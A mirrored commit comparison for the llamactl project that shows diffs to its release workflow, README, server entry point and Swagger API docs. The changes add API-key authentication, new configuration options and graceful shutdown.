Mirror of https://github.com/lordmathis/llamactl.git (synced 2025-11-06 00:54:23 +00:00)

Compare commits (36 commits)
| SHA1 |
|---|
| 8d9c808be1 |
| 161cd213c5 |
| d6e84f0527 |
| 0846350d41 |
| dacaca8594 |
| 6e3f5cec61 |
| 85b3638efb |
| 934d1c5aaa |
| 2abe9c282e |
| 6a7a9a2d09 |
| a3c44dad1e |
| 7426008ef9 |
| cf26aa521a |
| d94c922314 |
| 3cbd23a6e2 |
| bed172bf73 |
| d449255bc9 |
| de89d0673a |
| dd6ffa548c |
| 7935f19cc1 |
| f1718198a3 |
| b24d744cad |
| fff8b2dbde |
| b94909dee4 |
| ae1bf8561f |
| ad117ef6c6 |
| 169432260a |
| f94a150b07 |
| c038cabaf6 |
| 89f90697ef |
| 8e8056f071 |
| 4d06bc487a |
| bedec089ef |
| b3540d5b3e |
| 72ba008d1e |
| 0aa5def9ec |
.github/workflows/release.yaml (vendored, 59 lines changed)
@@ -108,63 +108,9 @@ jobs:
*.zip
retention-days: 1

generate-changelog:
name: Generate Changelog
runs-on: ubuntu-latest
outputs:
changelog: ${{ steps.changelog.outputs.changelog }}
steps:
- name: Checkout repository
uses: actions/checkout@v4
with:
fetch-depth: 0

- name: Generate changelog
id: changelog
run: |
# Get the previous tag
PREVIOUS_TAG=$(git tag --sort=-version:refname | grep -v "^${{ github.ref_name }}$" | head -n1)

if [ -z "$PREVIOUS_TAG" ]; then
echo "No previous tag found, generating changelog from first commit"
PREVIOUS_TAG=$(git rev-list --max-parents=0 HEAD)
fi

echo "Generating changelog from $PREVIOUS_TAG to ${{ github.ref_name }}"

# Generate changelog
CHANGELOG=$(cat << 'EOL'
## What's Changed

EOL
)

# Get commits between tags
COMMITS=$(git log --pretty=format:"* %s (%h)" "$PREVIOUS_TAG..${{ github.ref_name }}" --no-merges)

if [ -z "$COMMITS" ]; then
CHANGELOG="${CHANGELOG}* No changes since previous release"
else
CHANGELOG="${CHANGELOG}${COMMITS}"
fi

# Add full changelog link if we have a previous tag and it's not a commit hash
if [[ "$PREVIOUS_TAG" =~ ^v[0-9] ]]; then
CHANGELOG="${CHANGELOG}

**Full Changelog**: https://github.com/${{ github.repository }}/compare/${PREVIOUS_TAG}...${{ github.ref_name }}"
fi

# Save changelog to output (handle multiline)
{
echo 'changelog<<EOF'
echo "$CHANGELOG"
echo EOF
} >> $GITHUB_OUTPUT

release:
name: Create Release
needs: [build, generate-changelog]
needs: [build]
runs-on: ubuntu-latest
steps:
- name: Download all artifacts

@@ -184,8 +130,9 @@ jobs:
uses: softprops/action-gh-release@v2
with:
name: Release ${{ github.ref_name }}
body: ${{ needs.generate-changelog.outputs.changelog }}
tag_name: ${{ github.ref_name }}
files: release-assets/*
generate_release_notes: true
draft: false
prerelease: ${{ contains(github.ref_name, '-') }}
env:
README.md (291 lines changed)
@@ -2,79 +2,151 @@
A control server for managing multiple Llama Server instances with a web-based dashboard.
**Management server for multiple llama.cpp instances with OpenAI-compatible API routing.**

## Features
## Why llamactl?

- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
- **Web Dashboard**: Modern React-based UI for managing instances
- **Auto-restart**: Configurable automatic restart on instance failure
- **Instance Monitoring**: Real-time health checks and status monitoring
- **Log Management**: View, search, and download instance logs
- **REST API**: Full API for programmatic control
- **OpenAI Compatible**: Route requests to instances by instance name
- **Configuration Management**: Comprehensive llama-server parameter support
- **System Information**: View llama-server version, devices, and help
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
⚡ **Persistent State**: Instances survive server restarts

## Prerequisites
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management

This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
## Quick Start

**Install llama.cpp:**
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
```bash
# 1. Install llama-server (one-time setup)
# See: https://github.com/ggml-org/llama.cpp#quick-start

# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/

# 3. Start the server
llamactl
# Access dashboard at http://localhost:8080
```

## Usage

### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Set model path and GPU layers
4. Start or stop the instance

### Or use the REST API:
```bash
# Create instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'

# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
-H "Authorization: Bearer your-key" \
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```

## Installation

### Build Requirements

- Go 1.24 or later
- Node.js 22 or later (for building the web UI)

### Building with Web UI
### Option 1: Download Binary (Recommended)

```bash
# Clone the repository
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/

# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest

# Windows - Download from releases page
```

### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl

# Install Node.js dependencies
cd webui
npm ci

# Build the web UI
npm run build

# Return to project root and build
cd ..
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```

# Run the server
./llamactl
## Prerequisites

You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:

```bash
# Quick install methods:
# Homebrew (macOS)
brew install llama.cpp

# Or build from source - see llama.cpp docs
```

## Configuration

llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
llamactl works out of the box with sensible defaults.

1. Hardcoded defaults
2. Configuration file
3. Environment variables
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs

instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances

auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```

<details><summary><strong>Full Configuration Guide</strong></summary>

llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:

```
Defaults < Configuration file < Environment variables
```

### Configuration Files

Configuration files are searched in the following locations:
#### Configuration File Locations

Configuration files are searched in the following locations (in order of precedence):

**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `~/.config/llamactl/config.yaml`
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`

**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`

You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.

### Configuration Options

@@ -82,20 +154,27 @@ You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment

```yaml
server:
host: "" # Server host to bind to (default: "")
port: 8080 # Server port to bind to (default: 8080)
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```

**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)

#### Instance Configuration

```yaml
instances:
port_range: [8000, 9000] # Port range for instances
log_directory: "/tmp/llamactl" # Directory for instance logs
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
@@ -105,122 +184,34 @@ instances:

**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_LOG_DIR` - Log directory path
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
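For illustration, `LLAMACTL_INSTANCE_PORT_RANGE` accepts either a dash- or comma-separated pair as noted above. The following is a minimal Go sketch of parsing such a value; it is illustrative only and not the project's actual `ParsePortRange` implementation:

```go
// Sketch only: parse "8000-9000" or "8000,9000" into a [2]int range,
// returning [0, 0] for anything that cannot be parsed.
package main

import (
	"fmt"
	"strconv"
	"strings"
)

func parsePortRange(s string) [2]int {
	for _, sep := range []string{"-", ","} {
		if parts := strings.Split(s, sep); len(parts) == 2 {
			lo, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
			hi, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
			if err1 == nil && err2 == nil {
				return [2]int{lo, hi}
			}
		}
	}
	return [2]int{0, 0} // invalid format
}

func main() {
	fmt.Println(parsePortRange("8000-9000")) // [8000 9000]
	fmt.Println(parsePortRange("8000,9000")) // [8000 9000]
	fmt.Println(parsePortRange("oops"))      // [0 0]
}
```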
### Example Configuration
#### Authentication Configuration

```yaml
server:
host: "0.0.0.0"
port: 8080

instances:
port_range: [8001, 8100]
log_directory: "/var/log/llamactl"
max_instances: 10
llama_executable: "/usr/local/bin/llama-server"
default_auto_restart: true
default_max_restarts: 5
default_restart_delay: 10
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```

## Usage
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys

### Starting the Server

```bash
# Start with default configuration
./llamactl

# Start with custom config file
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl

# Start with environment variables
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
```

### Web Dashboard

Open your browser and navigate to `http://localhost:8080` to access the web dashboard.

### API Usage

The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.

#### Create an Instance

```bash
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"model": "/path/to/model.gguf",
"gpu_layers": 32,
"auto_restart": true
}'
```

#### List Instances

```bash
curl http://localhost:8080/api/v1/instances
```

#### Start/Stop Instance

```bash
# Start
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start

# Stop
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
```

### OpenAI Compatible Endpoints

Route requests to instances by including the instance name as the model parameter:

```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-instance",
"messages": [{"role": "user", "content": "Hello!"}]
}'
```
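
The same routing works from any HTTP client. Below is a minimal Go sketch of the request above; the instance name, server address, and the commented-out API key are placeholders for your own setup:

```go
// Minimal sketch: send an OpenAI-style chat completion to llamactl,
// routed to an instance by using its name as the "model" field.
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"net/http"
)

func main() {
	payload := map[string]any{
		"model": "my-instance", // llamactl instance name, not a model file path
		"messages": []map[string]string{
			{"role": "user", "content": "Hello!"},
		},
	}
	body, _ := json.Marshal(payload)

	req, _ := http.NewRequest("POST", "http://localhost:8080/v1/chat/completions", bytes.NewReader(body))
	req.Header.Set("Content-Type", "application/json")
	// req.Header.Set("Authorization", "Bearer your-inference-key") // if inference auth is enabled

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	out, _ := io.ReadAll(resp.Body)
	fmt.Println(string(out))
}
```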

## Development

### Running Tests

```bash
# Go tests
go test ./...

# Web UI tests
cd webui
npm test
```

### Development Server

```bash
# Start Go server in development mode
go run ./cmd/server

# Start web UI development server (in another terminal)
cd webui
npm run dev
```

## API Documentation

Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
</details>

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
MIT License - see [LICENSE](LICENSE) file.
@@ -2,9 +2,13 @@ package main

import (
"fmt"
llamactl "llamactl/pkg"
"llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"net/http"
"os"
"os/signal"
"syscall"
)

// @title llamactl API
@@ -15,29 +19,63 @@ import (
// @basePath /api/v1
func main() {

config, err := llamactl.LoadConfig("")
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil {
fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.")
}

// Create the log directory if it doesn't exist
err = os.MkdirAll(config.Instances.LogDirectory, 0755)
if err != nil {
fmt.Printf("Error creating log directory: %v\n", err)
return
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
}

if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
}
}

// Initialize the instance manager
instanceManager := llamactl.NewInstanceManager(config.Instances)
instanceManager := manager.NewInstanceManager(cfg.Instances)

// Create a new handler with the instance manager
handler := llamactl.NewHandler(instanceManager, config)
handler := server.NewHandler(instanceManager, cfg)

// Setup the router with the handler
r := llamactl.SetupRouter(handler)
r := server.SetupRouter(handler)

// Start the server with the router
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
// Handle graceful shutdown
stop := make(chan os.Signal, 1)
signal.Notify(stop, os.Interrupt, syscall.SIGTERM)

server := http.Server{
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
Handler: r,
}

go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
}
}()

// Wait for shutdown signal
<-stop
fmt.Println("Shutting down server...")

if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}

// Wait for all instances to stop
instanceManager.Shutdown()

fmt.Println("Exiting llamactl.")
}
docs/docs.go (82 lines changed)
@@ -21,6 +21,11 @@ const docTemplate = `{
|
||||
"paths": {
|
||||
"/instances": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of all instances managed by the server",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -47,6 +52,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the details of a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -83,6 +93,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"put": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Updates the configuration of a specific instance by name",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -131,6 +146,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Creates a new instance with the provided configuration options",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -179,6 +199,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"delete": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops and removes a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -214,6 +239,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/logs": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the logs from a specific instance by name with optional line limit",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -258,6 +288,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/proxy": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -297,6 +332,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -338,6 +378,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/restart": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Restarts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -376,6 +421,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/start": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Starts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -414,6 +464,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/stop": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -452,6 +507,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/server/devices": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of available devices for the llama server",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -475,6 +535,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/server/help": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the help text for the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -498,6 +563,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/server/version": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the version of the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -521,7 +591,12 @@ const docTemplate = `{
|
||||
},
|
||||
"/v1/": {
|
||||
"post": {
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body",
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the ` + "`" + `Authorization` + "`" + ` header.",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
],
|
||||
@@ -550,6 +625,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/v1/models": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of instances in a format compatible with OpenAI API",
|
||||
"tags": [
|
||||
"openai"
|
||||
|
||||
@@ -14,6 +14,11 @@
|
||||
"paths": {
|
||||
"/instances": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of all instances managed by the server",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -40,6 +45,11 @@
|
||||
},
|
||||
"/instances/{name}": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the details of a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -76,6 +86,11 @@
|
||||
}
|
||||
},
|
||||
"put": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Updates the configuration of a specific instance by name",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -124,6 +139,11 @@
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Creates a new instance with the provided configuration options",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -172,6 +192,11 @@
|
||||
}
|
||||
},
|
||||
"delete": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops and removes a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -207,6 +232,11 @@
|
||||
},
|
||||
"/instances/{name}/logs": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the logs from a specific instance by name with optional line limit",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -251,6 +281,11 @@
|
||||
},
|
||||
"/instances/{name}/proxy": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -290,6 +325,11 @@
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -331,6 +371,11 @@
|
||||
},
|
||||
"/instances/{name}/restart": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Restarts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -369,6 +414,11 @@
|
||||
},
|
||||
"/instances/{name}/start": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Starts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -407,6 +457,11 @@
|
||||
},
|
||||
"/instances/{name}/stop": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -445,6 +500,11 @@
|
||||
},
|
||||
"/server/devices": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of available devices for the llama server",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -468,6 +528,11 @@
|
||||
},
|
||||
"/server/help": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the help text for the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -491,6 +556,11 @@
|
||||
},
|
||||
"/server/version": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the version of the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -514,7 +584,12 @@
|
||||
},
|
||||
"/v1/": {
|
||||
"post": {
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body",
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
],
|
||||
@@ -543,6 +618,11 @@
|
||||
},
|
||||
"/v1/models": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of instances in a format compatible with OpenAI API",
|
||||
"tags": [
|
||||
"openai"
|
||||
|
||||
@@ -399,6 +399,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: List all instances
|
||||
tags:
|
||||
- instances
|
||||
@@ -422,6 +424,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Delete an instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -446,6 +450,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get details of a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -478,6 +484,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Create and start a new instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -510,6 +518,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Update an instance's configuration
|
||||
tags:
|
||||
- instances
|
||||
@@ -540,6 +550,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get logs from a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -568,6 +580,8 @@ paths:
|
||||
description: Instance is not running
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Proxy requests to a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -595,6 +609,8 @@ paths:
|
||||
description: Instance is not running
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Proxy requests to a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -620,6 +636,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Restart a running instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -645,6 +663,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Start a stopped instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -670,6 +690,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
